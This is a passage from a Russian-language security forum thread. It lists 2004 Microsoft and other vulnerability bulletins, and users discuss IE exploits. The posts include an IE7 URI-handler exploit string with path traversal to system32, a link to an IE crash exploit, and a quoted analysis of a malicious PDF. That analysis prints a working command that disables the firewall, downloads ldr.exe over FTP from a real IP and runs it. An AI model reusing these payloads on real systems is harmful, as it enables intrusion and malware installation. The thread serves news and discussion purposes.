накопительный патч. Продукты: MICROSOFT: Internet Explorer 6.0 MICROSOFT: Internet Explorer 5.5 Документы: MICROSOFT: Security Bulletin MS02-047: Cumulative Patch for Internet Explorer (Q323759), ]]>http://www.security.nnov.ru/search/document.asp?docid=3411]]> GreyMagic Software, Accessing remote/local content in IE (GM#009-IE), ]]>http://www.security.nnov.ru/search/document.asp?docid=3422]]> NGSSoftware Insight Security Research, Microsoft Internet Explorer Legacy Text Control Buffer Overflow (#NISR26082002), ]]>http://www.security.nnov.ru/search/document.asp?docid=3430]]> GreyMagic Software, Regression in IE: Accessing remote/local content in IE (GM#009-IE), ]]>http://www.security.nnov.ru/search/document.asp?docid=6984]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=2246]]> 8. Переполнение буфера в RIM Blackberry (buffer overflow) Опубликовано: 13 октября 2004 г. Источник: FULL-DISCLOSURE Тип: удаленная Опасность: 5 Описание: Переполнение буфера при синхронизации встреч с Microsoft Exchange. Продукты: RIM: Blackberry 7230 Документы: vuln@hexview.com, [Full-Disclosure] [HV-HIGH] RIM Blackberry buffer overflow, DoS, data loss, ]]>http://www.security.nnov.ru/search/document.asp?docid=6994]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4093]]> 10. Переполнение буфера в ZIP-папках Windows (buffer overflow) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: клиент Опасность: 5 Описание: Переполнение целочисленного типа при длинном имени файла в архиве. Продукты: MICROSOFT: Windows XP MICROSOFT: Windows 2003 Server Документы: MICROSOFT: Microsoft Security Bulletin MS04-034 Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376), ]]>http://www.security.nnov.ru/search/document.asp?docid=6979]]> EEYE: [Full-Disclosure] EEYE: Windows Shell ZIP File Decompression DUNZIP32.DLL Buffer Overflow Vulnerability, ]]>http://www.security.nnov.ru/search/document.asp?docid=6989]]> Файлы: Microsoft Security Bulletin MS04-034 Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376), ]]>http://www.microsoft.com/technet/security/...n/MS04-034.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4087]]> 11. Выполнение кода через Microsoft Excel (code execution) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: клиент Опасность: 5 Продукты: MICROSOFT: Office 2000 MICROSOFT: Office XP Документы: MICROSOFT: Microsoft Security Bulletin MS04-033 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (886836), ]]>http://www.security.nnov.ru/search/document.asp?docid=6978]]> Файлы: Microsoft Security Bulletin MS04-033 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (886836), ]]>http://www.microsoft.com/technet/security/...n/MS04-033.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4086]]> 12. Переполнение буфера в NetDDE в Microsoft Windows (buffer overflow) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 5 Продукты: MICROSOFT: Windows NT 4.0 Server MICROSOFT: Windows 2000 Server MICROSOFT: Windows 2000 Professional MICROSOFT: Windows XP MICROSOFT: Windows 2003 Server Документы: MICROSOFT: Microsoft Security Bulletin MS04-031, ]]>http://www.security.nnov.ru/search/document.asp?docid=6976]]> Файлы: Microsoft Security Bulletin MS04-031 Vulnerability in NetDDE Could Allow Remote Code Execution (841533), ]]>http://www.microsoft.com/technet/security/...n/MS04-031.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4084]]> 13. Многочисленные проблемы с RPC в Microsoft Windows NT (multiple bugs) Опубликовано: 13 октября 2004 г. Источник: MICROSOFT Тип: удаленная Опасность: 5 Продукты: MICROSOFT: Windows NT Server 4.0 Документы: MICROSOFT: Microsoft Security Bulletin MS04-029 Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350), ]]>http://www.security.nnov.ru/search/document.asp?docid=6974]]> BINDVIEW: [VulnWatch] BindView Advisory: Memory Leak and DoS in NT4 RPC server, ]]>http://www.security.nnov.ru/search/document.asp?docid=6995]]> Файлы: Microsoft Security Bulletin MS04-029 Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350), ]]>http://www.microsoft.com/technet/security/...n/MS04-029.mspx]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4082]]> 16. Слабые разрешения на службы Windows 2003 Server (weak permissions) Опубликовано: 13 октября 2004 г. Источник: BUGTRAQ Тип: локальная Опасность: 4 Описание: Разрешения на службы Distributed Link tracking Server и Internet Connection Firewall Service позволяют управлять ими непривилегированному пользователю. Продукты: MICROSOFT: Windows 2003 Server Документы: Ziots, Edward, Insecure Default Service DACL's in Windows 2003, ]]>http://www.security.nnov.ru/search/document.asp?docid=6973]]> Обсудить: ]]>http://www.security.nnov.ru/board/index.asp?boardnum=4081]]> Новые файлы: Microsoft Security Bulletin MS04-033 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (886836) ]]>http://www.microsoft.com/technet/security/...n/MS04-033.mspx]]> Microsoft Security Bulletin MS04-029 Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350) ]]>http://www.microsoft.com/technet/security/...n/MS04-029.mspx]]> Microsoft Security Bulletin MS04-030 Vulnerability in WebDAV XML Message Handler Could Lead to a Denial of Service (824151) ]]>http://www.microsoft.com/technet/security/...n/MS04-030.mspx]]> Microsoft Security Bulletin MS04-031 Vulnerability in NetDDE Could Allow Remote Code Execution (841533) ]]>http://www.microsoft.com/technet/security/...n/MS04-031.mspx]]> Microsoft Security Bulletin MS04-032 Security Update for Microsoft Windows (840987) ]]>http://www.microsoft.com/technet/security/...n/MS04-032.mspx]]> Microsoft Security Bulletin MS04-034 Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376) ]]>http://www.microsoft.com/technet/security/...n/MS04-034.mspx]]> Microsoft Security Bulletin MS04-035 Vulnerability in SMTP Could Allow Remote Code Execution (885881) ]]>http://www.microsoft.com/technet/security/...n/MS04-035.mspx]]> Microsoft Security Bulletin MS04-036 Vulnerability in NNTP Could Allow Remote Code Execution (883935) ]]>http://www.microsoft.com/technet/security/...n/MS04-036.mspx]]> Microsoft Security Bulletin MS04-037 Vulnerability in Windows Shell Could Allow Remote Code Execution (841356) ]]>http://www.microsoft.com/technet/security/...n/MS04-037.mspx]]> Microsoft Security Bulletin MS04-038 Cumulative Security Update for Internet Explorer (834707) ]]>http://www.microsoft.com/technet/security/...n/MS04-038.mspx]]> |
|
|
23.03.2005 - 10:29
Вставить ник | Быстрая цитата | Сообщение
#13
|
|
Частый гость Группа: Участник Сообщений: 248 Регистрация: 29.11.2004 Пользователь №: 5564 |
Последние обновления для Windows 2000 можно скачать тут:
]]>ftp://10.1.176.72/windows.updatez/cabs/]]> |
|
|
Guest_Not Right Now_* |
23.03.2005 - 11:17
| Быстрая цитата | Сообщение
#14
|
Гости |
Цитата([BlockDog].DaMN @ 23.03.2005 - 10:29) Последние обновления для Windows 2000 можно скачать тут: ]]>ftp://10.1.176.72/windows.updatez/cabs/]]> у тебя для русской win2k. твои заплатки мне не ставяться |
|
|
Guest_Nigger_* |
23.03.2005 - 11:34
| Быстрая цитата | Сообщение
#15
|
Гости |
Цитата(Encapi @ 23.03.2005 - 11:17) у тебя для русской win2k. твои заплатки мне не ставяться Да нет там никаких новых заплаток еще с января(на майкрософте). Только что проверил. |
|
|
Guest_Not Right Now_* |
23.03.2005 - 11:35
| Быстрая цитата | Сообщение
#16
|
Гости |
Цитата(Nigger @ 23.03.2005 - 11:34) Да нет там никаких новых заплаток еще с января(на майкрософте). Только что проверил. я не так уж часто обновляюсь. у меня стоят 4SP и заплатки от червей и всё. |
|
|
5.02.2006 - 00:07
Вставить ник | Быстрая цитата | Сообщение
#17
|
|
#!/usr/bin/neolite Группа: Модератор Сообщений: 1728 Регистрация: 11.11.2003 Пользователь №: 887 |
There is a remotely exploitable vulnerability in the Internet Explorer in the JScripting/Flash plugin section.
The problem lies in bad scripting of document.write() method being executed trough VBscript procedure triggered from ActionScript code within the crafted flash animation. While exiting the IExplorer's jscript.dll call it causes a null pointer assignment in IE leading to the memory access violation and browser crash. The following configurations has been tested and found vulnerable: Windows 2000 sp4 with all MS patches Windows XP sp2 Windows XP64 Windows 98 SE An example DoS exploit exists at: ]]>http://www.anspi.pl/~porkythepig/iedown.html]]> and also by clicking the right bottom at: ]]>http://www.anspi.pl/~porkythepig/index.html]]> Remote code execution possibility hasn't been verified yet , but it still may exist. Vulnerability found and DoS exploit built by: porkythepig contact: porkythepig@anspi.pl |
|
|
10.11.2007 - 13:57
Вставить ник | Быстрая цитата | Сообщение
#18
|
|
Энтузиаст Группа: Участник Сообщений: 361 Регистрация: 12.11.2004 Пользователь №: 5343 |
Программа:
Microsoft Windows XP Microsoft Windows Server 2003 Internet Explorer 7 Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в URI обработчике. Атакующий может передать специально сформированные данные через предоставленный URI, что приведет к выполнению произвольного кода. Пример: http:%xx../../../../../../../../../../../windows/syst[скрыто модератором gormih]em32/calc.exe".bat mailto:test% ../../../../windows/system32/calc.exe".cmd ]]> Данная ссылка является Exploit'ом ошибки в обработке УРЛ"а (Траффик 1 кат.) Качайте на свой страх и риск я никакой ответственности не несу(CL1F) ]]> ://http://www.securityfocus.com/data/v...>[/color]</b> </a> ссылка внешняя Сообщение отредактировано CL!F - 17.11.2007 - 23:52 |
|
|
14.11.2007 - 11:56
Вставить ник | Быстрая цитата | Сообщение
#19
|
|
Это вам не это... Группа: Участник Сообщений: 4018 Регистрация: 17.03.2004 Пользователь №: 2796 |
Пример: Только всё не много по другому, а приведённая ссылка не иначе как ссылка на вирусhttp:%xx../../../../../../../../../../../windows/system32/calc.exe".bat mailto:test% ../../../../windows/system32/calc.exe".cmd [скрыто модератором gormih] ссылка внешняя Цитата За вирусной PDF-атакой стоит питерский хостинг RBN ?
Если пользователь открывает зараженный файл, троян вырубает защитные системы Windows и закачивает на зараженный компьютер пару скрытых приложений, которые крадут финансовую и другую ценную информацию. Условия для успешной атаки - браузер IE7 на Windows XP или Windows Server 2003, а также старые версии Adobe Reader или Adobe Acrobat. При этом шпионские программы закачиваются с серверов российского хостинга RBN, сообщил Кен Данхэм, специалист по безопасности из iSight Partners. По его словам, и эти адреса, и сами шпионские файлы давно известны - те же вредоносные коды использовались в сентябре 2006 года для атак через дыру в VML. Более подробный разбор хакерского кода в PDF-файлах был сделан сегодня и российскими экспертами по безопасности. Они также отмечают, что вредоносный загрузчик хостится в сети Russian Business Network. Фрагмент PDF: ##5 0 obj<>dendobjd6 0 obj###<<###/CropBox[0 0 595 842]/Parent 1 0 R/Contents 13 0 R/Rotate 0/Group< ###<####/I true/CS/DeviceRGB/S/Transparency>>/MediaBox[0 0 595 842]/Resources 7 0 R/Type/Page/AA<>>>dendobjd14 0 obj< %/../../../../../../Windows/system32/cmd".exe"" /c /q "@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo b inary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&" "nul.bat)/S/URI>>dendobjd1 0 obj< Примерно вот так это выглядит, если по-русски: /Windows/system32/cmd".exe"" /c /q @echo off netsh firewall set opmode mode=disable echo o 81.95.146.130 echo binary echo get /ldr.exe echo quit ftp -s:1 -v -A>nul del /q start ldr.exe Адрес принадлежит конечно РБН: Добавил: Leon 29.10.2007 03:10 Источник: ]]>http://www.inattack.ru/news/2361.html]]> Сообщение отредактировано gormih - 16.11.2007 - 00:40 |
|
|
15.11.2007 - 23:55
Вставить ник | Быстрая цитата | Сообщение
#20
|
|
Энтузиаст Группа: Участник Сообщений: 361 Регистрация: 12.11.2004 Пользователь №: 5343 |
Михаил с чего мне нужно подсовывать вирусы я ссылки проверяю лично) Файл был просканирован на наличе spyware and viruses ничего не обнаружено. На спайвары - аутпост - на вирусы - нод с послед обновлениями. но сам текст pdf'a не понятен..
вот txt файл с текстом PDF'a Сообщение отредактировано gormih - 16.11.2007 - 00:39 |
|
|
Текстовая версия | Сейчас: 27.12.2024 - 06:51 |